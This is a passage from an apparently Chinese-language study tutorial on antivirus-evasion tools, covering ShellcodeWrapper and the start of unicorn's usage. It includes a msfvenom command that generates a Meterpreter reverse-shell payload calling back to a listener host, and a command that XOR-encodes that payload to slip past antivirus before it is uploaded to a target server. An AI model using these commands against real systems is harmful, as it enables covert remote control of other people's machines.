### 工具免殺 選擇了幾個簡單或者近期還有更新的免殺工具進行學習 #### ShellcodeWrapper 專案地址 https://github.com/Arno0x/ShellcodeWrapper 該工具的原理是使用異或加密或者aes加密，做到混淆，進行免殺。 先使用msfvenom生成raw格式檔案 ``` msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.2.1 LPORT=4444 -f raw -o shellcode.raw ``` 下面命令`mi0` 是密碼隨意寫即可。 ``` python shellcode_encoder.py -cpp -cs -py payload/shellcode.raw mi0 xor ``` 會生成3個檔案，用C++編譯的cpp檔案，用python編譯的py檔案和用c#編譯的cs檔案 直接丟到vs中把cpp編譯生成exe檔案即可，上傳目標伺服器。 #### unicorn 專案地址 https://github.com/trustedsec/unicorn.git 從github上下載下來就可以執行，使用方法非常簡單 支援生成ps1、macro、hta、dde等形式的程式碼和檔案 所有型別的使用方法如下 ``` Usage: python unicorn.py payload reverse_ipad